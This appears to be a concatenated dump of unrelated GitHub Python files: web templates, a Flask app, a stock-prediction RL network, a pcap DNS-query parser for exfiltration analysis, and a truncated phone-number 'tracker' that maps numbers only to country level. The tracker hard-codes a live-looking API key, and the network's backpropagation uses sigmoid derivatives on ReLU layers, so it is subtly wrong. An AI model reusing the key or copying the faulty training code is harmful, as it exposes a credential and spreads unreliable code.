-*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\nSTOP_RENDERING = runtime.STOP_RENDERING\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1460095264.574406\n_enable_loop = True\n_template_filename = '/Users/Jordan/Documents/BYU/0 - Senior Year/0 - Winter 2016/0 - 413/Colonial_Heritage_Foundation/manager/templates/index.html'\n_template_uri = 'index.html'\n_source_encoding = 'utf-8'\nimport os, os.path, re, json\n_exports = ['top_content_area']\n\n\ndef _mako_get_namespace(context, name):\n try:\n return context.namespaces[(__name__, name)]\n except KeyError:\n _mako_generate_namespaces(context)\n return context.namespaces[(__name__, name)]\ndef _mako_generate_namespaces(context):\n pass\ndef _mako_inherit(template, context):\n _mako_generate_namespaces(context)\n return runtime._inherit_from(context, 'app_base.htm', _template_uri)\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n def top_content_area():\n return render_top_content_area(context._locals(__M_locals))\n __M_writer = context.writer()\n __M_writer('\\n\\n')\n if 'parent' not in context._data or not hasattr(context._data['parent'], 'top_content_area'):\n context['self'].top_content_area(**pageargs)\n \n\n __M_writer('\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\ndef render_top_content_area(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n def top_content_area():\n return render_top_content_area(context)\n __M_writer = context.writer()\n __M_writer('\\n

Colonial Heritage Foundation Administrator Area

\\n
\\n
\\n')\n __M_writer('

Welcome to the admin area of chfsales.com.

\\n \\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"line_map\": {\"35\": 1, \"52\": 3, \"53\": 8, \"54\": 14, \"40\": 17, \"60\": 54, \"28\": 0, \"46\": 3}, \"uri\": \"index.html\", \"filename\": \"/Users/Jordan/Documents/BYU/0 - Senior Year/0 - Winter 2016/0 - 413/Colonial_Heritage_Foundation/manager/templates/index.html\", \"source_encoding\": \"utf-8\"}\n__M_END_METADATA\n\"\"\"\n","repo_name":"jwiddison/Django-Mako-Plus-Ecommerce-Site","sub_path":"manager/cached_templates/templates/index.html.py","file_name":"index.html.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72873013560","text":"# pylint: disable=C0111, E0401\n\"\"\" API Entry Point \"\"\"\n\nimport json\n\nimport hug\nimport urllib3\n\nhttp = urllib3.PoolManager()\n\n@hug.get(\"/\", output=hug.output_format.html)\ndef base():\n return \"

hello from ck_kis

\"\n\n\n@hug.get(\"/remote\")\ndef remote():\n r = http.request(\n 'GET',\n 'http://ck_kis_companies_nginx/add',\n fields={'num': 2}\n )\n\n if r.status == 200:\n return json.loads(r.data.decode('utf-8'))\n else:\n return json.loads({})\n","repo_name":"carlok/docker-network-boilerplate","sub_path":"ck_kis/api/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24972322712","text":"import numpy as np\nimport sys\n\n# np.seterr(divide='ignore', invalid='ignore')\n\n\ndef printProgress(iteration, total, prefix='', suffix='', decimals=1, barLength=100):\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\n\nclass Monitor(object):\n\tdef __init__(self, on=True):\n\t\tself.on = on\n\t\tself._HISTORY_ = {'ACTION':{'RESULT':[]}}\n\n\n\tdef history(self, action, result):\n\t\tself._HISTORY_['ACTION']['RESULT'].append(int(action == result))\n\n\n\tdef show(self, request):\n\t\tif request not in ['episod', 'anobservationset', 'anepoch', 'oneview']:\n\t\t\tprint('Invalid request type. Please check the option to request history.')\n\t\t\texit()\n\n\t\tif request == 'episod':\n\t\t\tsuccess = np.sum(self._HISTORY_['ACTION']['RESULT'])\n\t\t\tself._HISTORY_['ACTION']['RESULT'] = []\n\t\t\treturn success\n\n\t\telif request == 'anobservationset':\n\t\t\tpass\n\t\telif request == 'anepoch':\n\t\t\tpass\n\t\telse:\n\t\t\tpass\n\n\n\nclass Activities(object):\n\t_DISCOUNT_FACTOR_ = 0.995\n\n\tdef __init__(self, running_mode=0, epoch=1):\n\t\tself._COUNT_TOTAL_RUNNING_ = 0\n\n\t\t# running_type = 0: Training mode\n\t\t# running_type = 1: Testing mode\n\t\tself._ENV_ORSEVATIONS_ = Observations(running_mode, epoch)\n\t\tself.monitor = Monitor()\n\n\n\tdef _parse_current_observation(self):\n\t\ty_value = self._STATE_[-1]\n\t\tstate = self._STATE_[2:-1].astype('float')\n\t\t# state = (state - np.mean(state)) / np.std(state)\n\n\t\treturn state, y_value\n\n\n\tdef reset(self):\n\t\tself._SIZE_OF_CURRENT_DATESET_, epoch = self._ENV_ORSEVATIONS_.next_source()\n\t\treturn self._SIZE_OF_CURRENT_DATESET_, epoch\n\n\n\tdef step(self, preaction, action):\n\t\t_, y_value = self._parse_current_observation()\n\t\tdone = ~(action == y_value)\n\n\t\tprint(' ### PREDICTION: %s / %s, REAL: %s' % ('{0:2d}'.format(preaction), '{0:2d}'.format(action), '{0:2d}'.format(y_value)))\n\n\t\tif not done: reward = 1.\n\t\telse: reward = 0.1\n\n\t\tself.monitor.history(action, y_value)\n\n\t\treturn reward, done\n\n\n\tdef get_observation(self):\n\t\tself._STATE_ = self._ENV_ORSEVATIONS_.next_observation()\n\n\t\tif self._STATE_ is None:\n\t\t\treturn None\n\n\t\tself._COUNT_TOTAL_RUNNING_ += 1\n\t\tstate, _ = self._parse_current_observation()\n\t\treturn state\n\n\n\tdef get_size_of_an_epoch(self):\n\t\treturn self._ENV_ORSEVATIONS_.get_size_of_an_epoch()\n\n\n\tdef disount_rewards(self, rewards):\n\t\tdiscounted_rewards = np.zeros_like(rewards)\n\t\trunning_add = 0\n\t\tfor reversed_idx in reversed(range(0, rewards.size)):\n\t\t\trunning_add = running_add * self._DISCOUNT_FACTOR_ + rewards[reversed_idx]\n\t\t\tdiscounted_rewards[reversed_idx] = running_add\n\n\t\treturn discounted_rewards\n\n\n\tdef run_times(self):\n\t\treturn self._COUNT_TOTAL_RUNNING_\n\n\n\nclass Observations(object):\n\timport pandas as pd\n\tfrom databases import maria\n\n\n\t_RUNNING_MODE_ = None\n\n\t_RATE_SOURCE_TRAINING_ = None\n\n\t_SOURCE_SYMBOLS_ = None\n\t_SOURCE_CONNECTION_ = None\n\n\t_SIZE_SYMBOLS_ = None\n\t_SIZE_OBSERVATIONS_ = None\n\t_SIZE_OBSERVATIONS_IN_A_EPOCH_ = None\n\t_SIZE_EPOCH_ = None\n\n\t_CURRENT_SOURCE_OBSERVATIONS_ = None\n\t_CURRENT_SOURCE_SYMBOL_INDEX_ = None\n\t_CURRENT_OBSERVATION_INDEX_ = None\n\t_CURRENT_EPOCH_INDEX_ = None\n\n\tdef __init__(self, running_mode=0, epoch=1):\n\t\tself._RUNNING_MODE_ = running_mode\n\t\tself._SIZE_EPOCH_ = epoch\n\t\tself._RATE_SOURCE_TRAINING_ = 0.7\n\t\tself._SOURCE_CONNECTION_ = self.maria()\n\n\t\tquery_string = 'SELECT COUNT(*) count_symbols FROM krx_symbols'\n\t\tdf_result = self._SOURCE_CONNECTION_.select(query_string)\n\t\tcount_symbols = df_result.get_value(0, 'count_symbols')\n\n\t\tdivision_num = int(count_symbols * self._RATE_SOURCE_TRAINING_)\n\n\t\tquery_string = 'SELECT isin, 1 FROM krx_symbols WHERE isin = isin ORDER BY symb_name LIMIT %s, %s'\n\t\tvalues = [0 if running_mode == 0 else division_num,\n\t\t division_num if running_mode == 0 else count_symbols - division_num + 1]\n\t\t\n\t\tself._SOURCE_SYMBOLS_ = self._SOURCE_CONNECTION_.select(query_string, values)\n\t\tself._SIZE_SYMBOLS_ = len(self._SOURCE_SYMBOLS_)\n\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ = -1\n\t\tself._CURRENT_OBSERVATION_INDEX_ = -1\n\t\tself._CURRENT_EPOCH_INDEX_ = 0\n\n\t\tself._get_size_observations_in_a_epoch_()\n\n\n\tdef _get_size_observations_in_a_epoch_(self):\n\t\ttotal_symbol_size_in_a_epoch = 0\n\n\t\ti = 1\n\t\tfor isin, _ in self._SOURCE_SYMBOLS_.values:\n\t\t\tprintProgress(i, self._SIZE_SYMBOLS_, '', ' Initialized.', 2, 50)\n\n\t\t\tquery_string = 'SELECT COUNT(*) count_symbols FROM drl_proportion_source_1d WHERE isin = %s AND trans_date = trans_date'\n\t\t\tvalues = [isin]\n\t\t\tdf_result = self._SOURCE_CONNECTION_.select(query_string, values)\n\n\t\t\ttotal_symbol_size_in_a_epoch += df_result.get_value(0, 'count_symbols')\n\n\t\t\ti += 1\n\n\t\tself._SIZE_OBSERVATIONS_IN_A_EPOCH_ = total_symbol_size_in_a_epoch\n\n\n\tdef next_source(self):\n\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ += 1\n\n\t\tif self._CURRENT_SOURCE_SYMBOL_INDEX_ == len(self._SOURCE_SYMBOLS_):\n\t\t\tself._CURRENT_EPOCH_INDEX_ += 1\n\t\t\tself._CURRENT_SOURCE_SYMBOL_INDEX_ = 0\n\t\t\t\n\t\t\tif self._CURRENT_EPOCH_INDEX_ == self._SIZE_EPOCH_:\n\t\t\t\tself._CURRENT_EPOCH_INDEX_ = -1\n\t\t\t\treturn -1, self._SIZE_EPOCH_\n\n\t\tisin = self._SOURCE_SYMBOLS_.loc[self._CURRENT_SOURCE_SYMBOL_INDEX_, 'isin']\n\n\t\tquery_string = 'SELECT * ' + \\\n\t\t\t\t\t\t'FROM drl_proportion_source_1d ' + \\\n\t\t\t\t\t\t'WHERE isin = %s AND trans_date = trans_date ' + \\\n\t\t\t\t\t\t'ORDER BY trans_date'\n\t\tvalues = [isin]\n\t\tself._CURRENT_SOURCE_OBSERVATIONS_ = self._SOURCE_CONNECTION_.select(query_string, values)\n\t\tself._SIZE_OBSERVATIONS_ = len(self._CURRENT_SOURCE_OBSERVATIONS_)\n\t\treturn self._SIZE_OBSERVATIONS_, self._CURRENT_EPOCH_INDEX_\n\n\n\tdef next_observation(self):\n\t\tself._CURRENT_OBSERVATION_INDEX_ += 1\n\n\t\tif(self._CURRENT_OBSERVATION_INDEX_ == len(self._CURRENT_SOURCE_OBSERVATIONS_)):\n\t\t\tself._CURRENT_OBSERVATION_INDEX_ = -1\n\t\t\treturn None\n\n\t\tobservation = self._CURRENT_SOURCE_OBSERVATIONS_.loc[self._CURRENT_OBSERVATION_INDEX_, ]\n\t\treturn np.array(observation.values)\n\n\n\tdef get_size_of_an_epoch(self):\n\t\treturn self._SIZE_OBSERVATIONS_IN_A_EPOCH_\n\n\n\tdef get_index_of_current_datasource(self):\n\t\treturn self._CURRENT_OBSERVATION_INDEX_\n\n\n\nclass DeepNeuralNetwork(object):\n\t_BUFFER_RMS_BACK_PROPAGATION_ = []\n\t_BUFFER_COST_GRADIENTDESCENT_ = []\n\t_BUFFER_LAYER1_ = None\n\t_BUFFER_LAYER2_ = None\n\t_BUFFER_LAYER3_ = None\n\t_BUFFER_LAYER4_ = None\n\t_BUFFER_LAYER5_ = None\n\t_BUFFER_LAYER6_ = None\n\n\t_MODEL_ = {}\n\t\n\t_SIZE_BATCH_ = 10\n\t_INDEX_CURRENT_LAYER_BUFFER_ = 0\n\n\t_RATE_DECAY_ = 0.995\n\t_RATE_LEARNING_ = 0.001\n\n\tdef __init__(self, out_dim, input_dim):\n\t\tnp.random.seed(1)\n\n\t\tself._MODEL_['W1'] = self.xavier(input_dim**2, input_dim)\n\t\tself._MODEL_['W2'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W3'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W4'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W5'] = self.xavier(input_dim**2, input_dim**2)\n\t\tself._MODEL_['W6'] = self.xavier(input_dim, input_dim**2)\n\t\tself._MODEL_['W7'] = self.xavier(out_dim, input_dim)\n\n\t\tfor _ in range(self._SIZE_BATCH_):\n\t\t\tself._BUFFER_COST_GRADIENTDESCENT_.append({key: np.zeros_like(values) for key, values in self._MODEL_.items()})\n\n\t\tself._BUFFER_RMS_BACK_PROPAGATION_ = {key: np.zeros_like(values) for key, values in self._MODEL_.items()}\n\t\tself._init_layer_buf()\n\n\tdef _init_layer_buf(self):\n\t\tself._BUFFER_LAYER1_ = []\n\t\tself._BUFFER_LAYER2_ = []\n\t\tself._BUFFER_LAYER3_ = []\n\t\tself._BUFFER_LAYER4_ = []\n\t\tself._BUFFER_LAYER5_ = []\n\t\tself._BUFFER_LAYER6_ = []\n\t\tself._INDEX_CURRENT_LAYER_BUFFER_ = 0\n\n\n\tdef _release_layer_buf(self):\n\t\tself._BUFFER_LAYER1_ = np.vstack(self._BUFFER_LAYER1_)\n\t\tself._BUFFER_LAYER2_ = np.vstack(self._BUFFER_LAYER2_)\n\t\tself._BUFFER_LAYER3_ = np.vstack(self._BUFFER_LAYER3_)\n\t\tself._BUFFER_LAYER4_ = np.vstack(self._BUFFER_LAYER4_)\n\t\tself._BUFFER_LAYER5_ = np.vstack(self._BUFFER_LAYER5_)\n\t\tself._BUFFER_LAYER6_ = np.vstack(self._BUFFER_LAYER6_)\n\n\n\t# Policy Forward\n\tdef feed_forward(self, x):\n\t\tself._BUFFER_LAYER1_.append(self.ReLU(np.dot(self._MODEL_['W1'], x))) # 1st Layer\n\t\tself._BUFFER_LAYER2_.append(self.ReLU(np.dot(self._MODEL_['W2'], self._BUFFER_LAYER1_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 2nd Layer\n\t\tself._BUFFER_LAYER3_.append(self.ReLU(np.dot(self._MODEL_['W3'], self._BUFFER_LAYER2_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 3rd Layer\n\t\tself._BUFFER_LAYER4_.append(self.ReLU(np.dot(self._MODEL_['W4'], self._BUFFER_LAYER3_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 4th Layer\n\t\tself._BUFFER_LAYER5_.append(self.ReLU(np.dot(self._MODEL_['W5'], self._BUFFER_LAYER4_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 5rd Layer\n\t\tself._BUFFER_LAYER6_.append(self.ReLU(np.dot(self._MODEL_['W6'], self._BUFFER_LAYER5_[self._INDEX_CURRENT_LAYER_BUFFER_]))) # 6th Layer\n\t\thypothesis = self.softmax(np.dot(self._MODEL_['W7'], self._BUFFER_LAYER6_[self._INDEX_CURRENT_LAYER_BUFFER_])) # 7th Layer / Hypothesis Layer\n\n\t\tself._INDEX_CURRENT_LAYER_BUFFER_ += 1\n\t\treturn hypothesis\n\n\n\t# Poliby Backward - Back Propagation\n\tdef feed_backward(self, states, policygradient_errs, episode):\n\t\tself._release_layer_buf()\n\n\t\tH_rmsprotagation_Layer6 = np.dot(policygradient_errs, self._MODEL_['W7'])\n\t\tD_rmsprotagation_Layer6 = self._BUFFER_LAYER6_ * (1 - self._BUFFER_LAYER6_)\n\t\tW_rmsprotagation_Layer6 = H_rmsprotagation_Layer6 * D_rmsprotagation_Layer6\n\n\t\tH_rmsprotagation_Layer5 = np.dot(W_rmsprotagation_Layer6, self._MODEL_['W6'])\n\t\tD_rmsprotagation_Layer5 = self._BUFFER_LAYER5_ * (1 - self._BUFFER_LAYER5_)\n\t\tW_rmsprotagation_Layer5 = H_rmsprotagation_Layer5 * D_rmsprotagation_Layer5\n\n\t\tH_rmsprotagation_Layer4 = np.dot(W_rmsprotagation_Layer5, self._MODEL_['W5'])\n\t\tD_rmsprotagation_Layer4 = self._BUFFER_LAYER4_ * (1 - self._BUFFER_LAYER4_)\n\t\tW_rmsprotagation_Layer4 = H_rmsprotagation_Layer4 * D_rmsprotagation_Layer4\n\n\t\tH_rmsprotagation_Layer3 = np.dot(W_rmsprotagation_Layer4, self._MODEL_['W4'])\n\t\tD_rmsprotagation_Layer3 = self._BUFFER_LAYER3_ * (1 - self._BUFFER_LAYER3_)\n\t\tW_rmsprotagation_Layer3 = H_rmsprotagation_Layer3 * D_rmsprotagation_Layer3\n\n\t\tH_rmsprotagation_Layer2 = np.dot(W_rmsprotagation_Layer3, self._MODEL_['W3'])\n\t\tD_rmsprotagation_Layer2 = self._BUFFER_LAYER2_ * (1 - self._BUFFER_LAYER2_)\n\t\tW_rmsprotagation_Layer2 = H_rmsprotagation_Layer2 * D_rmsprotagation_Layer2\n\n\t\tH_rmsprotagation_Layer1 = np.dot(W_rmsprotagation_Layer2, self._MODEL_['W2'])\n\t\tD_rmsprotagation_Layer1 = self._BUFFER_LAYER1_ * (1 - self._BUFFER_LAYER1_)\n\t\tW_rmsprotagation_Layer1 = H_rmsprotagation_Layer1 * D_rmsprotagation_Layer1\n\n\t\tW_rmsprotagation_Layer7 = np.dot(self._BUFFER_LAYER6_.T, policygradient_errs).T\n\t\tW_rmsprotagation_Layer6 = np.dot(W_rmsprotagation_Layer6.T, self._BUFFER_LAYER5_)\n\t\tW_rmsprotagation_Layer5 = np.dot(W_rmsprotagation_Layer5.T, self._BUFFER_LAYER4_)\n\t\tW_rmsprotagation_Layer4 = np.dot(W_rmsprotagation_Layer4.T, self._BUFFER_LAYER3_)\n\t\tW_rmsprotagation_Layer3 = np.dot(W_rmsprotagation_Layer3.T, self._BUFFER_LAYER2_)\n\t\tW_rmsprotagation_Layer2 = np.dot(W_rmsprotagation_Layer2.T, self._BUFFER_LAYER1_)\n\t\tW_rmsprotagation_Layer1 = np.dot(W_rmsprotagation_Layer1.T, states)\n\n\t\tself._BUFFER_COST_GRADIENTDESCENT_[episode % self._SIZE_BATCH_] = {\n\t\t\t'W1': W_rmsprotagation_Layer1,\n\t\t\t'W2': W_rmsprotagation_Layer2,\n\t\t\t'W3': W_rmsprotagation_Layer3,\n\t\t\t'W4': W_rmsprotagation_Layer4,\n\t\t\t'W5': W_rmsprotagation_Layer5,\n\t\t\t'W6': W_rmsprotagation_Layer6,\n\t\t\t'W7': W_rmsprotagation_Layer7\n\t\t}\n\t\tself._init_layer_buf()\n\n\n\tdef deep_learning(self):\n\t\t# Skip the zeros buffer, it was assigned zeros to add the learned values new assigning to...\n\t\t# So, the process will be stated from 1.\n\t\tcost_optimized_layers = self._BUFFER_COST_GRADIENTDESCENT_[0]\n\n\t\tfor i in range(1, self._SIZE_BATCH_):\n\t\t\tfor key, values in self._MODEL_.items():\n\t\t\t\tcost_optimized_layers[key] += self._BUFFER_COST_GRADIENTDESCENT_[i][key]\n\n\t\tfor key, values in self._MODEL_.items():\n\t\t\tcost_optimized_layer = cost_optimized_layers[key]\n\t\t\tself._BUFFER_RMS_BACK_PROPAGATION_[key] = self._RATE_DECAY_ * self._BUFFER_RMS_BACK_PROPAGATION_[key] + \\\n\t\t\t (1 - self._RATE_DECAY_) * cost_optimized_layer**2\n\t\t\tself._MODEL_[key] += self._RATE_LEARNING_ * cost_optimized_layer / (np.sqrt(self._BUFFER_RMS_BACK_PROPAGATION_[key]) + 1e-5)\n\n\n\tdef model(self):\n\t\treturn self._MODEL_\n\n\n\tdef xavier(self, out_dim, in_dim, prime=False):\n\t\treturn np.random.randn(out_dim, in_dim) / np.sqrt(in_dim / 2 if prime else 1)\n\n\n\tdef sigmoid(self, x):\n\t\treturn 1.0 / (1.0 + np.exp(-x))\n\n\n\tdef softmax(self, x):\n\t\te = np.exp(x - np.max(x)) # prevent overflow\n\t\tif e.ndim == 1:\n\t\t\treturn e / np.sum(e, axis=0)\n\t\telse:\n\t\t\treturn e / np.array([np.sum(e, axis=1)]).T # ndim = 2\n\n\n\tdef ReLU(self, x):\n\t\treturn x * (x > 0)\n\n\tdef onthot(self, x):\n\t\tx = x.reshape(-1)\n\t\treturn np.eye(len(x))[np.argmax(x)]\n\n\n\nclass ReinforcementLearning(object):\n\t_DISCOUNT_FACTOR_ = 0.995\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef disount_rewards(self, rewards):\n\t\tdiscounted_rewards = np.zeros_like(rewards)\n\t\trunning_add = 0\n\t\tfor reversed_idx in reversed(range(0, rewards.size)):\n\t\t\trunning_add = running_add * self._DISCOUNT_FACTOR_ + rewards[reversed_idx]\n\t\t\tdiscounted_rewards[reversed_idx] = running_add\n\n\t\treturn discounted_rewards\n\n\n","repo_name":"PeterDeSOM/innostock","sub_path":"core/environments.py","file_name":"environments.py","file_ext":"py","file_size_in_byte":13356,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"43588779690","text":"def grep(filename,wrd):\r\n with open(filename) as f:\r\n for line in f:\r\n \r\n if wrd in line:\r\n m=line.split(',')\r\n for n in m:\r\n return n\r\ny=grep('input.txt','Facebook')\r\nprint(y)\r\n","repo_name":"imnmo/Python-Introduction","sub_path":"Python Hands On/Python Introduction/MId term/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15214562911","text":"import dpkt\nimport socket\nf = open('f*cking_pcap+file.pcap', 'rb')\npcap = dpkt.pcap.Reader(f)\nfor ts, buf in pcap:\n eth = dpkt.ethernet.Ethernet(buf)\n ip = eth.data\n udp = ip.data\n dns = dpkt.dns.DNS(udp.data)\n\n #checking if the packet is a DNS query\n if dns.qr == dpkt.dns.DNS_Q:\n #extracting the domain name from the query\n domain_name = dns.qd[0].name\n #extracting the IP address from the query\n ip_address = socket.inet_ntoa(ip.src)\n #printing the domain name and IP address\n print('Domain Name: %s, IP Address: %s' % (domain_name, ip_address))\n","repo_name":"odintheprotector/DNS-Exfiltration","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16955060099","text":"from flask import Flask, render_template, url_for, redirect, flash\r\nfrom forms import getpicture\r\nfrom functions import apiRequest\r\nimport json\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = ''\r\napi_key = ''\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n return render_template('home.html', title='Cosmonautinspace')\r\n\r\n@app.route('/postcards', methods = ['GET', 'POST'])\r\ndef postcard_home():\r\n form = getpicture()\r\n if form.validate_on_submit():\r\n apiRequest(api_key, form.pictureDate.data, form.rover.data)\r\n return redirect(url_for('postcards', rover=form.rover.data, pictureDate = form.pictureDate.data))\r\n else:\r\n flash(form.errors)\r\n return render_template('postcards_home.html', title='Home',form=form)\r\n\r\n@app.route('/postcards//')\r\ndef postcards(rover,pictureDate):\r\n file = open(f'cache/{rover}/{pictureDate}.json')\r\n data = json.load(file)\r\n file.close()\r\n return render_template('postcards.html', title=pictureDate, data=data)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True) \r\n","repo_name":"cosmonautinspace/Postcards-from-mars","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72953410041","text":"from model import Model\n\nclass Head_Pose_Estimation(Model):\n '''\n Class for the Head Pose Estimation Model.\n '''\n def __init__(self, model_name, device='CPU', extensions=None):\n super(Head_Pose_Estimation, self).__init__(model_name, device, extensions)\n\n self.input_name = next(iter(self.network.inputs))\n self.input_shape = self.network.inputs[self.input_name].shape\n self.input_width = self.input_shape[2]\n self.input_height = self.input_shape[3]\n self.output_name = next(iter(self.network.outputs))\n\n def predict(self, image):\n '''\n This method is meant for running predictions on the input image.\n '''\n input_image = self.preprocess_input(image)\n\n input_dict={self.input_name:input_image}\n outputs = self.exec_network.infer(input_dict)\n\n yaw, pitch, roll = self.preprocess_output(outputs)\n\n return yaw, pitch, roll\n\n def preprocess_input(self, image):\n processed_image = super().preprocess_input(image, self.input_height, self.input_width)\n return processed_image\n\n def preprocess_output(self, outputs):\n '''\n Before feeding the output of this model to the next model,\n preprocess the output.\n '''\n yaw = outputs['angle_y_fc'][0][0]\n pitch = outputs['angle_p_fc'][0][0]\n roll = outputs['angle_r_fc'][0][0]\n\n return yaw, pitch, roll\n","repo_name":"yamatokataoka/computer-pointer-controller","sub_path":"src/head_pose_estimation.py","file_name":"head_pose_estimation.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5138360848","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef load_data(path_X,path_y,test_size=0.5,standardize_X=False, standardize_y=False):\n X_test_adaptive = pd.read_csv(path_X, index_col = 'Unnamed: 0')\n y_test = pd.read_csv(path_y, index_col = 'Unnamed: 0')\n\n if path_X==\"traffic_predictions_test_val.csv\":\n X_test_adaptive = X_test_adaptive.drop(columns = ['DummyRegressor', 'Lasso', 'LassoLars'])\n elif path_X==\"data/X_test_adaptive.csv\":\n X_test_adaptive = X_test_adaptive.drop(\n columns=['RANSACRegressor', 'GaussianProcessRegressor', 'KernelRidge', 'Lars', 'AdaBoostRegressor',\n 'DummyRegressor', 'ExtraTreeRegressor', 'Lasso', 'LassoLars', 'PassiveAggressiveRegressor'])\n\n X_t, X_te, y_t, y_te = train_test_split(X_test_adaptive, y_test, test_size = test_size, shuffle = False, random_state = 6)\n\n if standardize_X:\n scaler_X = StandardScaler()\n scaler_X.fit(X_t)\n X_t = scaler_X.transform(X_t)\n X_te = scaler_X.transform(X_te)\n\n scaler_y = StandardScaler()\n if standardize_y:\n scaler_y.fit(y_t)\n y_t = scaler_y.transform(y_t)\n y_te = scaler_y.transform(y_te)\n\n return np.array(X_t), np.array(X_te), np.array(y_t).reshape(-1), np.array(y_te).reshape(-1), scaler_y\n\n\ndef get_X_Z_y(X, y, T):\n '''\n Input: training data X and corresponding labels y ; how many time-steps from the past to be used\n Output: the past features X with past targets y as a Z training data (no present features)\n '''\n n, p = X.shape\n #T past time steps * p features + T targets + intercept term\n Z = np.ones((n-T, T*p+T+1))\n for i in range(T, n):\n for t in range(T):\n Z[i-T,p*t:p*(t+1)] = X[i-t-1]\n Z[i-T, p*T:-1] = y[i-T:i]\n return X[T:], Z, y[T:]\n\ndef get_X_Z_y_standard_regression(X, y, T):\n '''\n Input: training data X and corresponding labels y ; how many time-steps from the past to be used\n Output: the past features X with past targets y as a Z training data + present features\n '''\n n, p = X.shape\n # T past time steps * p features + p present features + T targets + intercept term\n Z = np.ones((n-T, (T+1)*p+T+1))\n for i in range(T, n):\n for t in range(T+1):\n Z[i-T,p*t:p*(t+1)] = X[i-t]\n Z[i-T, p*(T+1):-1] = y[i-T:i]\n return X[T:], Z, y[T:]","repo_name":"leobix/adaptive_ensemble","sub_path":"python_code/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"27908350116","text":"import requests\nimport time\n\n\ndef download_site(url, session):\n with session.get(url) as response:\n print(f\"Read {len(response.content)} from {url}\")\n\n\ndef download_all_sites(sites):\n with requests.Session() as session:\n for url in sites:\n download_site(url, session)\n\n\nif __name__ == \"__main__\":\n sites = [\n \"https://www.dinamalar.com\",\n \"https://thehindu.com\",\n ] * 80\n start_time = time.time()\n download_all_sites(sites)\n duration = time.time() - start_time\n print(f\"Downloaded {len(sites)} in {duration} seconds\")","repo_name":"sanjaypradeep/Python-Data-Structure","sub_path":"MultiTasking/Synchronous.py","file_name":"Synchronous.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"38576483856","text":"import json\nimport pycountry\nfrom tkinter import Tk, Label, Button, Entry\nimport requests\n\n\nfrom phone_iso3166.country import phone_country\n\ndef number_details1():\n import phonenumbers\n import folium\n from mynumber import number\n from phonenumbers import geocoder,timezone,carrier\n \n\n key ='b72366878ec4414381ce6defa1dec069'\n samnumber = phonenumbers.parse(number)\n print(samnumber)\n yourlocation = geocoder.description_for_number(samnumber,\"en\")\n print(\"Country Name : \",yourlocation)\n\n time= timezone.time_zones_for_number(samnumber)\n print(\"Zone :\", time)\n\n #get service provider\n\n service_provider = phonenumbers.parse(number)\n print(\"Operator : \",carrier.name_for_number(service_provider,\"en\"))\n\n from opencage.geocoder import OpenCageGeocode\n geocoder = OpenCageGeocode(key)\n\n query=str(yourlocation)\n result=geocoder.geocode(query)\n #print(result)\n\n lat=result[0]['geometry']['lat']\n lng=result[0]['geometry']['lng']\n print(lat,lng)\n\n mymap= folium.Map(location=[lat,lng],zoom_start=9)\n\n folium.Marker([lat,lng],popup=yourlocation).add_to((mymap))\n\n ##save map on html file\n mymap.save(\"mylocation.html\")\n\ndef number_details2():\n \n #track secound\n class Location_Tracker:\n def __init__(self, App):\n self.window = App\n self.window.title(\"Phone number Tracker\")\n self.window.geometry(\"500x400\")\n self.window.configure(bg=\"#3f5efb\")\n self.window.resizable(False, False)\n \n #___________Application menu_____________\n Label(App, text=\"Enter a phone number\",fg=\"white\", font=(\"Times\", 20), bg=\"#3f5efb\").place(x=150,y= 30)\n self.phone_number = Entry(App, width=16, font=(\"Arial\", 